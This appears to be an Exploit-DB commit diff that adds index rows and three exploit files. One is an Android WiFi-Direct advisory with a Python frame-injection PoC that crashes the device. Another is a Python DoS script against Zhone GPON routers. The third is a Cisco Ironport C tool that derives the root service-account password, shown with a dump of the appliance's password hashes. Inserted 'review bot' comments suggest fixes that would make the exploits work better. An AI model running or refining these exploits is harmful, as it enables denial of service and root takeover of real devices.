Update: 2015-01-28

24 new exploits
Offensive Security 2015-01-28 08:35:58 +00:00
parent db799531d8
commit 40cfbfb905
25 changed files with 2996 additions and 0 deletions


@ -32307,6 +32307,9 @@ id,file,description,date,author,platform,type,port
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service Vulnerability",2011-06-14,echo,multiple,dos,0
35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection Vulnerability",2015-01-21,TranDinhTien,php,webapps,0
35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0
35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0
35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
@ -32318,19 +32321,40 @@ id,file,description,date,author,platform,type,port
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0
35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0
35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0
35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0
35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0
35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-28,"Luigi Auriemma",windows,dos,0
35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0
35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
35900,platforms/php/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
35901,platforms/windows/local/35901.txt,"VLC Player 2.1.5 - DEP Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management Vulnerability",2015-01-26,"Rewterz - Research Group",jsp,webapps,0
35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0
35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0
35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS) Vulnerability",2015-01-26,"Maddy Khan",multiple,webapps,0
35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS Vulnerabilities",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0
35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0
35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
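Review bot: the author field of the 35887 row (`"Glafkos Charalambous "`) carries a trailing space inside the quotes, which will make the name sort and match differently from the same author's other entries; trim it. The port column is also inconsistent within this hunk: 35891 is recorded with port 8080 while its sibling 35890 for the same ServiceDesk Plus 9.0 product is 0, and 35914 (ferretCMS) is 80 where every other web application row is 0; either all web rows should carry the service port or none should.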

platforms/android/dos/35913.txt Executable file

@ -0,0 +1,438 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
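Review bot: section 6 lists only "avoid WiFi-Direct" and "upgrade" as mitigations, but the stack trace in section 8 (`WifiMonitor$MonitorThread.handleP2pEvents` -> `WifiP2pDevice.<init>`) shows the root cause is that `WifiMonitor` lets the constructor's declared `IllegalArgumentException` escape the system process; the advisory would be stronger if it stated that the fix is for `handleP2pEvents` to catch that exception and drop the malformed event rather than let the system process die. It is also worth saying explicitly that the malformation originates in the supplicant's event formatting, not in `detailedDevicePattern`: the logged event `P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 ... 'fa¬¬'` has dotted addresses and no `name=` prefix, so the pattern correctly rejects it. Minor text fixes before release: "Unhandle Exception on WiFiMonitor class" should read "unhandled exception in the WifiMonitor class"; "Oct 20rd, 2014" in the timeline; "does not completely agrees" should be "agree"; and the timeline entry dated 2014-10-16 that follows the 2014-10-20 entry is out of order (probably 2014-10-21 or later).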

platforms/hardware/dos/35859.py Executable file

@ -0,0 +1,40 @@
from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
if(len(sys.argv) != 2):
print '*********************************************************************************'
print ' GPON Zhone R4.0.2.566b D.O.S.'
print ' Tested on'
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski lramirez@websec.mx '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"
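Review bot: the `data` dict binds `XWebPageName=buffer` (lowercase), which is the Python 2 builtin `buffer` type rather than the `BUFFER` string, so `urlencode` sends the repr of the type object in that field; the intended value is presumably `BUFFER` or a literal page name. The bare `except:` around `h.request` also turns any failure into "GPON should be down", including a DNS error, a connection refused on the very first request, or a Ctrl-C, so the script reports a crash when it never reached the device; catch `socket.error` and `httplib2.ServerNotFoundError` explicitly and only treat a failure after at least one successful response as evidence. Finally, `Http()` is constructed without a timeout, so an appliance that hangs instead of dropping the connection will hang the script; use `Http(timeout=...)`.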


@ -0,0 +1,240 @@
/*
Cisco Ironport Appliances Privilege Escalation Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.5.5-280
Cisco Ironport WSA - AsyncOS 8.0.5-075
Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure
Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation.
By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations.
The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.
Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account.
[SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password.
[GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access.
[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528
Technical Details:
By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access.
This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service.
Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance.
Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.
PoC:
Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"
#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"
void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);
int main(int argc, char *argv[]) {
if (argc < 2) { usage(argv[0]); }
int opt;
int index;
char *temp_pass = { 0 };
char *serial_no = { 0 };
char *secret_pass = SECRET_PASS;
char service[MAX_BUFFER] = { 0 };
unsigned char digest[16] = { 0 };
while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
switch (opt)
{
case 'p':
temp_pass = optarg;
break;
case 's':
serial_no = optarg;
break;
case 'h': usage(argv[0]);
break;
default:
printf_s("Wrong Argument: %s\n", argv[1]);
break;
}
}
for (index = optind; index < argc; index++) {
usage(argv[0]);
exit(0);
}
if (temp_pass == NULL || serial_no == NULL) {
usage(argv[0]);
exit(0);
}
if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
to_lower(serial_no);
fuzz_string(temp_pass);
strcpy_s(service, sizeof(service), temp_pass);
strcat_s(service, sizeof(service), serial_no);
strcat_s(service, sizeof(service), secret_pass);
MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, service, strlen(service));
MD5_Final(digest, &context);
printf_s("Service Password: ");
for (int i = 0; i < sizeof(digest)-12; i++)
printf("%02x", digest[i]);
}
return 0;
}
void fuzz_string(char *str) {
while (*str){
switch (*str) {
case '1': *str = 'i'; break;
case '0': *str = 'o'; break;
case '_': *str = '-'; break;
}
str++;
}
}
void to_lower(char *str) {
while (*str) {
if (*str >= 'A' && *str <= 'Z') {
*str += 0x20;
}
str++;
}
}
void usage(char *name) {
printf_s("\nUsage: %s -p password -s serial\n", name);
printf_s(" -p <password> | Cisco Service Temp Password\n");
printf_s(" -s <serial> | Cisco Serial Number\n");
printf_s(" -h | This Help Menu\n");
